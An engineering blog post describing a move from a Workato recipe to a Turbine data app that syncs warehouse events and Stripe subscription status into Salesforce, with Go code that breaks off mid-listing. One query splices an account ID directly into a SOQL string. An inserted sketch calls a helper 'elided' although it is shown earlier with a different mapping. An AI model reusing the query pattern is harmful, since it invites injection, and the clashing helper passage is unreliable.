&lt;p&gt;Before we get into the app, let’s begin by talking about how we were getting data from our data warehouse to Salesforce. Prior to using our own platform, we made use of Workato. Workato is a no-code solution that allows you to create “recipes” in their graphical editor. The recipe pulled data from our data warehouse, made a few API calls, and then wrote data to our Salesforce instance. There wasn’t an option for real-time, so we compromised and set up the recipe to execute hourly. The diagram below illustrates the setup.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Workato%20Blog_before-sfdc-sync_Image%201.png&quot; alt=&quot;Workato Blog_before-sfdc-sync_Image 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;While this setup worked there were a few points of friction. The first was general lifecycle management of the recipes. The process for managing, testing and updating recipes was not great, especially for engineers who are used to version control and mature CI/CD pipelines. The second issue was that it was hard for new engineers to quickly understand what the recipe was doing. Understanding a recipe required navigating up and down levels in the Workato editor. We found ourselves wanting to just write code. With the introduction of Turbine, Meroxa’s data application framework that lets you quickly sync, persist, and transform data between data infrastructure, we saw this use case as a perfect candidate for replacement with a Turbine data app.&lt;/p&gt;
&lt;h1&gt;Where we are now&lt;/h1&gt;
&lt;p&gt;The diagram below shows a high-level view of our new setup. Instead of a Workato recipe we now have a real-time Turbine data app deployed on the Meroxa platform.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Workato%20Blog_after_image%202.png&quot; alt=&quot;Workato Blog_after_image 2&quot;&gt;&lt;/p&gt;
&lt;p&gt;By solving this issue using a Turbine data app, we were able to gain several benefits. Instead of having to learn a specialized editor, our developers are able to use their existing workflows. By bringing this solution into the realm of code, any engineer on the team can improve and support it. Learning what the app does is now simply a matter of reading the code. Finally, our data app is real-time rather than an hourly batch job.&lt;/p&gt;
&lt;h1&gt;How’d we do it?&lt;/h1&gt;
&lt;p&gt;While the picture above is nice, I’d like to get into the details of what’s actually involved.&lt;/p&gt;
&lt;p&gt;So what did we need to do to get all these benefits?&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Register a Salesforce OAuth App&lt;/li&gt;
&lt;li&gt;Write a Turbine data app to replace the recipe.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;The Salesforce App&lt;/h2&gt;
&lt;p&gt;Our first step was using the Salesforce Admin Console to create an app that we could use to interact with their API. I won’t go into detail on creating a connected app; you can find Salesforce’s documentation &lt;a href=&quot;https://help.salesforce.com/s/articleView?id=sf.connected_app_overview.htm&amp;#x26;type=5&quot;&gt;here&lt;/a&gt;. Once the Salesforce app was set up and we had our &lt;code class=&quot;language-text&quot;&gt;client_id&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;client_secret&lt;/code&gt; it was time to actually write our Turbine App.&lt;/p&gt;
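For readers who haven’t wired this up before: the connected app’s credentials get exchanged for an access token at Salesforce’s token endpoint. The sketch below shows the username-password OAuth flow in Python as one possibility; the post doesn’t say which flow the team actually used, and every credential value here is a placeholder.

```python
# Hedged sketch: exchanging connected-app credentials for a Salesforce
# access token via the username-password OAuth flow. This is one of
# several flows Salesforce supports; all values below are placeholders.
import urllib.parse

TOKEN_URL = "https://login.salesforce.com/services/oauth2/token"

def build_token_request(client_id, client_secret, username, password):
    """Build the form-encoded body for the Salesforce token request."""
    return urllib.parse.urlencode({
        "grant_type": "password",
        "client_id": client_id,
        "client_secret": client_secret,
        "username": username,
        # Append your org's security token to the password if required.
        "password": password,
    })

body = build_token_request("my-client-id", "my-secret", "ops@example.com", "hunter2")
# A real call would POST this body to TOKEN_URL and read "access_token"
# out of the JSON response, e.g. with urllib.request or an HTTP client.
print("grant_type=password" in body)  # → True
```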
&lt;h2&gt;Writing our Turbine App&lt;/h2&gt;
&lt;p&gt;The main tasks our Turbine app needed to accomplish were taking the event data, supplementing it with info from Stripe, and transforming it into the proper format for Salesforce. Let’s see how we were able to accomplish that with a minimal amount of code.&lt;/p&gt;
&lt;p&gt;Here we’re using Stripe’s Go client library to fetch subscription information. What’s great about this code is that nothing about it is Turbine specific. Turbine apps can easily use internal libraries and share code with existing applications, reducing duplication and easing development.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/stripe/stripe-go/v72&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/stripe/stripe-go/v72/sub&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;translateStatus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subStatus stripe&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;SubscriptionStatus&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; subStatus &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;past_due&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Past Due&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subStatus&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;bsf BasicStripeFetcher&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;fetchSubscriptionStatus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subID &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	stripe&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Key &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; bsf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;apiKey

	subscription&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; sub&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subID&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	status &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;translateStatus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subscription&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Status&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; status&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
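&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;translateStatus&lt;/code&gt; helper called above is elided from the listing. Assuming it simply collapses Stripe’s subscription statuses into the coarser values our Salesforce field expects, a minimal sketch (the exact mapping below is an assumption, not the article’s code) could look like this:&lt;/p&gt;

```go
package main

import "fmt"

// translateStatus is a hypothetical sketch of the elided helper: it maps
// Stripe's subscription statuses onto the values stored in Salesforce.
// The concrete mapping here is an assumption, not the article's actual code.
func translateStatus(stripeStatus string) string {
	switch stripeStatus {
	case "active", "trialing":
		return "Active"
	case "past_due", "unpaid":
		return "Past Due"
	default:
		return "Canceled"
	}
}

func main() {
	fmt.Println(translateStatus("active")) // prints "Active"
}
```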
&lt;p&gt;The code below shows how we send data to the Salesforce API. Once again, nothing Turbine-specific here; we’re simply manipulating data and calling an API.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;errors&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;fmt&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;log&quot;&lt;/span&gt;

	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/simpleforce/simpleforce&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; ProductData &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	accountId            &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	email                &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	givenName            &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	familyName           &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	planName             &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	stripeSubscriptionId &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	subscriptionStatus   &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	accountCreatedAt     &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; SalesforceUpdater &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;updateProductInstance&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data ProductData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; BasicSalesforceUpdater &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	client &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;simpleforce&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Client
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;bsu BasicSalesforceUpdater&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;query&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data ProductData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	q &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Sprintf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;SELECT FIELDS(ALL) FROM Product_Instance__c WHERE Workspace_Id__c = &apos;%s&apos; LIMIT 1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;accountId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	result&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; bsu&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Query&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;q&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;result&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;unexpected query result&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	obj &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; result&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Records&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; obj &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;no product instance found&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	firstName &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; obj&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;StringField&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Admin_First_Name__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; firstName &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;couldn&apos;t fetch first name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;bsu BasicSalesforceUpdater&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;updateProductInstance&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data ProductData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	obj &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; bsu&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;SObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Product_Instance__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;ExternalIDField&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Workspace_Id__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Workspace_Id__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;accountId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Org: &quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;accountId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Admin_Email__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;email&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Admin_First_Name__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;givenName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Admin_Last_Name__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;familyName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Product__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;planName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Stripe_Subscription_Id__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;stripeSubscriptionId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Subscription_Status__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;subscriptionStatus&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Workspace_Created_At__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;accountCreatedAt&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Upsert&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; obj &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;upsert failed&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, we pull it all together in our &lt;code class=&quot;language-text&quot;&gt;app.go&lt;/code&gt;. Here we’re using the Turbine framework to connect to our data source, get the stream of events, and process those events using the helper functions defined above.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a App&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	platformDB&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;MY_DATA_WAREHOUSE&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	configs &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResourceConfigs&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResourceConfig&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
